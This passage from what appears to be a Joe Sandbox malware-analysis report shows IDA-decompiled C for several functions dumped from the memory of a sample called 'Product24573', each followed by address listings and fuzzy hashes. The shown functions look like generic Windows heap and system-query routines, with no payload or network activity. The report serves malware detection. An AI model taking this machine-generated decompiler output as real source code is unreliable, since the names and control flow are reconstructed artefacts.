									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E01122AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E01106600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E01122C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0110EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E01122AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E01122C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E01122ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0114D0D1(_t62);
				goto L28;
			}





















                                          0x01122990
                                          0x01122992
                                          0x01122997
                                          0x011229a3
                                          0x011229a6
                                          0x011229ab
                                          0x011229ad
                                          0x011229b2
                                          0x01165c80
                                          0x011229b8
                                          0x011229b8
                                          0x011229bb
                                          0x011229c0
                                          0x011229c5
                                          0x011229c6
                                          0x011229c6
                                          0x011229cb
                                          0x00000000
                                          0x00000000
                                          0x011229cd
                                          0x011229d0
                                          0x011229d9
                                          0x011229db
                                          0x011229dd
                                          0x01122a7f
                                          0x01122a84
                                          0x01122a87
                                          0x01122a89
                                          0x01165ca1
                                          0x01165ca3
                                          0x00000000
                                          0x01122a8f
                                          0x01122a8f
                                          0x00000000
                                          0x01122a8f
                                          0x00000000
                                          0x011229e3
                                          0x011229e3
                                          0x011229e3
                                          0x00000000
                                          0x011229e3
                                          0x011229dd
                                          0x00000000
                                          0x011229db
                                          0x011229e6
                                          0x011229e9
                                          0x011229eb
                                          0x011229ed
                                          0x011229f3
                                          0x011229f5
                                          0x011229f8
                                          0x011229fa
                                          0x01122a97
                                          0x01122a9a
                                          0x01122a9d
                                          0x01122add
                                          0x00000000
                                          0x01122a9f
                                          0x01122aa2
                                          0x01122aa5
                                          0x01122aa8
                                          0x01122aab
                                          0x01165cab
                                          0x01165caf
                                          0x01165cc5
                                          0x01165cda
                                          0x01165cdc
                                          0x01165cdf
                                          0x01165ce5
                                          0x00000000
                                          0x01165ceb
                                          0x01165ced
                                          0x01165cee
                                          0x00000000
                                          0x01165cee
                                          0x01165cb1
                                          0x01165cb4
                                          0x01165cb9
                                          0x01165cbb
                                          0x00000000
                                          0x01165cbd
                                          0x01165cbd
                                          0x00000000
                                          0x01165cbd
                                          0x01165cbb
                                          0x01122ab1
                                          0x01122ab1
                                          0x01122ac4
                                          0x01122ac6
                                          0x01122ac6
                                          0x00000000
                                          0x01122ac6
                                          0x01122aab
                                          0x00000000
                                          0x01122a00
                                          0x01122a09
                                          0x01122a0e
                                          0x01122a21
                                          0x01122a24
                                          0x01122a35
                                          0x01122a3a
                                          0x01122a3d
                                          0x01122a42
                                          0x01122a59
                                          0x01122a59
                                          0x01122a5c
                                          0x01122a5f
                                          0x01122a5f
                                          0x011229fa
                                          0x011229f3
                                          0x01122a64
                                          0x01122a64
                                          0x01122a6b
                                          0x01122a6b
                                          0x01122a6d
                                          0x01122a72
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f1a96f2b60e03adc3e7a7ef62340bb987ecaeccc0535014e464d7f7961150c0c
                                          • Instruction ID: 46f4949458f68f7151990708231bf4db68dbe15a5006256b4f231ec085fa2b24
                                          • Opcode Fuzzy Hash: f1a96f2b60e03adc3e7a7ef62340bb987ecaeccc0535014e464d7f7961150c0c
                                          • Instruction Fuzzy Hash: 26517B71A0022ADFDF29DF59C880AEEBBB6FF58354F018155E900AB661D3319D62CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01124BAD Relevance: .1, Instructions: 131COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E01124BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x11ed360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E010FCC50(_t86);
					L11:
					return E0113B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x11e8504
				E01112280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0113FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0113B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L01114620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E010FCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x11e8504
								E0110FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E01124F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                          0x01124bad
                                          0x01124bbf
                                          0x01124bc2
                                          0x01124bc6
                                          0x01124bcd
                                          0x01124bd9
                                          0x011667fe
                                          0x01166800
                                          0x01124ccc
                                          0x01124ccd
                                          0x01124cb7
                                          0x01124cc9
                                          0x01124cc9
                                          0x01124bdf
                                          0x01124be5
                                          0x00000000
                                          0x00000000
                                          0x01124beb
                                          0x01124bef
                                          0x00000000
                                          0x00000000
                                          0x01124bf5
                                          0x01124bf9
                                          0x01124c06
                                          0x01124c0b
                                          0x01124c17
                                          0x01124c1c
                                          0x01124c1f
                                          0x01124c25
                                          0x01124c33
                                          0x01124c3d
                                          0x01124c40
                                          0x01124c43
                                          0x01124c47
                                          0x01124c4d
                                          0x01124c53
                                          0x01124c54
                                          0x01124c55
                                          0x01124c56
                                          0x01124c5b
                                          0x01124c5c
                                          0x01124c63
                                          0x01124c6b
                                          0x00000000
                                          0x00000000
                                          0x01166776
                                          0x01166784
                                          0x01166784
                                          0x0116679f
                                          0x011667a7
                                          0x011667af
                                          0x011667ce
                                          0x00000000
                                          0x011667b1
                                          0x011667b7
                                          0x011667b8
                                          0x011667c1
                                          0x011667d3
                                          0x011667d9
                                          0x011667dd
                                          0x01124c94
                                          0x01124c94
                                          0x01124c98
                                          0x01124c9c
                                          0x01124ca3
                                          0x011667f4
                                          0x011667f4
                                          0x01124cb5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01124cb5
                                          0x01124c79
                                          0x01124c7e
                                          0x01124c89
                                          0x01124c8b
                                          0x01124c8f
                                          0x01124c8f
                                          0x00000000
                                          0x01124c89
                                          0x011667c3
                                          0x00000000
                                          0x011667c3
                                          0x011667af
                                          0x01124c73
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d0cef19bf61228f6bfb346cb3d44f06d8426a6435b2d8451bd00e389d0bac62c
                                          • Instruction ID: 89bca785c6de4529ba9fe00cea4ccd28777ad83a397ea8376289eacd7c786faa
                                          • Opcode Fuzzy Hash: d0cef19bf61228f6bfb346cb3d44f06d8426a6435b2d8451bd00e389d0bac62c
                                          • Instruction Fuzzy Hash: 4041C635A0062D9BDB29DF6CC940FEA77B8EF45700F0100A5E908AB641E774DE90CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01124D3B Relevance: .1, Instructions: 131COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E01124D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x11ed360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0113FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x11e7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0113B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L01114620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E010FCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0113B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0113F380(_t67 + 0xc, 0x10d5138, 0x10) == 0) {
								 *0x11e60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E01124F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E01124E70(0x11e86b0, 0x1125690, 0, 0) != 0) {
					_t46 = E010FCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                          0x01124d3b
                                          0x01124d4d
                                          0x01124d53
                                          0x01124d58
                                          0x01124d65
                                          0x01124d6c
                                          0x01124d71
                                          0x01124d77
                                          0x01124d7f
                                          0x01124d8c
                                          0x01124d8e
                                          0x01124dad
                                          0x01124db0
                                          0x01124db7
                                          0x01124db8
                                          0x01124db9
                                          0x01124dba
                                          0x01124dbb
                                          0x01124dc1
                                          0x01124dc8
                                          0x01124dcc
                                          0x01124dd5
                                          0x01124dde
                                          0x01124ddf
                                          0x01124de0
                                          0x01124de1
                                          0x01124de6
                                          0x01124de7
                                          0x01124de9
                                          0x01124df3
                                          0x00000000
                                          0x00000000
                                          0x01166c7c
                                          0x01166c8a
                                          0x01166c8a
                                          0x01166c9d
                                          0x01166ca7
                                          0x01166cac
                                          0x01166cb2
                                          0x01166cb9
                                          0x00000000
                                          0x01166cbf
                                          0x01166cbf
                                          0x00000000
                                          0x01166cbf
                                          0x01166cb9
                                          0x01124dfb
                                          0x01166ccf
                                          0x01166cd3
                                          0x01124e32
                                          0x01124e39
                                          0x01166ce0
                                          0x01166cf2
                                          0x01166cf2
                                          0x01166ce0
                                          0x01124e3f
                                          0x01124e41
                                          0x01124e51
                                          0x01124e51
                                          0x01124e03
                                          0x01124e03
                                          0x01124e09
                                          0x01124e0f
                                          0x01124e57
                                          0x00000000
                                          0x00000000
                                          0x01124e1b
                                          0x01124e30
                                          0x01124e5b
                                          0x01124e5b
                                          0x00000000
                                          0x01124e30
                                          0x01124e11
                                          0x01124e11
                                          0x01124e16
                                          0x00000000
                                          0x01124e16
                                          0x01124e01
                                          0x00000000
                                          0x01124e01
                                          0x01124da5
                                          0x01166c6b
                                          0x00000000
                                          0x01124dab
                                          0x01124dab
                                          0x00000000
                                          0x01124dab

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1d05f53fe4e8300b1e6c1926898487974a6cffe7e0a1102953b9117ebef24aaa
                                          • Instruction ID: 7547480a5b902f468e20be008950be0d2b543731c3ee51887427715bcbe52008
                                          • Opcode Fuzzy Hash: 1d05f53fe4e8300b1e6c1926898487974a6cffe7e0a1102953b9117ebef24aaa
                                          • Instruction Fuzzy Hash: 70412671A043389FFB3ADF18CC80FAABBA9EB54714F0000A9E9459B685D774DD50CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011BAA16 Relevance: .1, Instructions: 120COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E011BAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E011BABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E011BAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E011BAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0119CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L011177F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E01117D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E011B131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0119CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                          0x011baa1f
                                          0x011baa21
                                          0x011baa23
                                          0x011baa2b
                                          0x011baa30
                                          0x011baa36
                                          0x011baa39
                                          0x011baa42
                                          0x011baa75
                                          0x011baa7a
                                          0x011baa7c
                                          0x011baa7c
                                          0x011baa88
                                          0x011baa8a
                                          0x011baa8f
                                          0x011bab02
                                          0x011bab04
                                          0x011baa99
                                          0x011baaa8
                                          0x011baaaf
                                          0x011baab3
                                          0x011baacc
                                          0x011baad1
                                          0x011baad6
                                          0x011baae0
                                          0x011baaf3
                                          0x011baaf9
                                          0x011baafe
                                          0x011baafe
                                          0x011baaf3
                                          0x011baad6
                                          0x011baab3
                                          0x011bab07
                                          0x011bab0a
                                          0x011bab11
                                          0x011bab23
                                          0x011bab13
                                          0x011bab1c
                                          0x011bab1c
                                          0x011bab2b
                                          0x011bab44
                                          0x011bab44
                                          0x011bab51
                                          0x011bab51
                                          0x011baa44
                                          0x011baa47
                                          0x011baa4c
                                          0x00000000
                                          0x00000000
                                          0x011baa5a
                                          0x011baa64
                                          0x011baa72
                                          0x00000000
                                          0x011baa66
                                          0x011baa66
                                          0x011baa68
                                          0x011baa6a
                                          0x00000000
                                          0x011baa6a

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                          • Instruction ID: 7cda353a4587efddd461ca9f72fb8a36c6ec415ee13f5ca6c1050db250bf2293
                                          • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                          • Instruction Fuzzy Hash: 93310432F002056BEB1D8B69D9D5BEFFBBAEF84250F054469E925A7291DB74CD00C750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01108A0A Relevance: .1, Instructions: 120COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E01108A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x11ed360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0113B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0110E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x10d1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E01121DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E01133C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E01108999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                          0x01108a0a
                                          0x01108a1c
                                          0x01108a23
                                          0x01108a2e
                                          0x01108a30
                                          0x01108a36
                                          0x01108a3c
                                          0x01108a3e
                                          0x01108a4a
                                          0x01108a52
                                          0x01108a9c
                                          0x01108aae
                                          0x01108a58
                                          0x01108a5e
                                          0x01108a6a
                                          0x01108a6f
                                          0x01108a75
                                          0x01108a7d
                                          0x01108a85
                                          0x01108a86
                                          0x01108a89
                                          0x01108a93
                                          0x01108a99
                                          0x01108a9b
                                          0x00000000
                                          0x01108aaf
                                          0x01108abe
                                          0x01108ac3
                                          0x01108acb
                                          0x01108ad7
                                          0x01108ae0
                                          0x01108af1
                                          0x00000000
                                          0x01108af1
                                          0x01108acd
                                          0x01108ad5
                                          0x01108afb
                                          0x01108afd
                                          0x01108aff
                                          0x01108b07
                                          0x01108b22
                                          0x01108b24
                                          0x01108b2a
                                          0x01108b2e
                                          0x01108b3f
                                          0x01108b78
                                          0x01108b41
                                          0x01108b52
                                          0x01108b54
                                          0x01108b5c
                                          0x01108b74
                                          0x01108b74
                                          0x01108b5c
                                          0x01108b3f
                                          0x01108b5e
                                          0x01108b61
                                          0x01108b64
                                          0x01108b64
                                          0x01108b6c
                                          0x01108b6c
                                          0x01108b11
                                          0x01159cd5
                                          0x01159cd5
                                          0x01108b17
                                          0x01108b1a
                                          0x01108b1a
                                          0x00000000
                                          0x01108ad5
                                          0x01108a89

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0ecd497808b886cd6443be03ad32817cddfa66ded4a2582b4d9259b97f6d6ad2
                                          • Instruction ID: 14b5ca39f427a3845bc58531724a443f053d03f7eb382c68feb47f7255679a90
                                          • Opcode Fuzzy Hash: 0ecd497808b886cd6443be03ad32817cddfa66ded4a2582b4d9259b97f6d6ad2
                                          • Instruction Fuzzy Hash: 8A4163B4E0432DDBDB29DF59C888AA9B7F4FB54300F1145E9D91997282E7B09E80CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011BFDE2 Relevance: .1, Instructions: 116COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 76%
                                          			E011BFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E011BFD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E011C0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E01117D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E011B1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E011C2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E011BC8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E011BDBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E01117D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E011BA80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                          0x011bfde7
                                          0x011bfde8
                                          0x011bfdec
                                          0x011bfdee
                                          0x011bfdf5
                                          0x011bfdf7
                                          0x011bfdfc
                                          0x011bfe19
                                          0x011bfe22
                                          0x011bfe26
                                          0x011bfec6
                                          0x011bfecd
                                          0x011bfed5
                                          0x011bfee7
                                          0x011bfed7
                                          0x011bfee0
                                          0x011bfee0
                                          0x011bfeef
                                          0x011bff00
                                          0x011bff02
                                          0x011bff07
                                          0x011bff07
                                          0x00000000
                                          0x011bfeef
                                          0x011bfe33
                                          0x011bfe55
                                          0x011bfe59
                                          0x011bfe5b
                                          0x011bfe5e
                                          0x011bfe69
                                          0x011bfe6d
                                          0x011bfe6d
                                          0x011bfe69
                                          0x011bfe35
                                          0x011bfe41
                                          0x011bfe41
                                          0x011bfe79
                                          0x011bfe8b
                                          0x011bfe7b
                                          0x011bfe84
                                          0x011bfe84
                                          0x011bfe93
                                          0x00000000
                                          0x011bfea8
                                          0x011bfeba
                                          0x00000000
                                          0x011bfeba
                                          0x011bfdfe
                                          0x011bfe01
                                          0x011bfe02
                                          0x011bfe08
                                          0x011bff0c
                                          0x011bff14
                                          0x011bff14

                                          Memory Dump Source
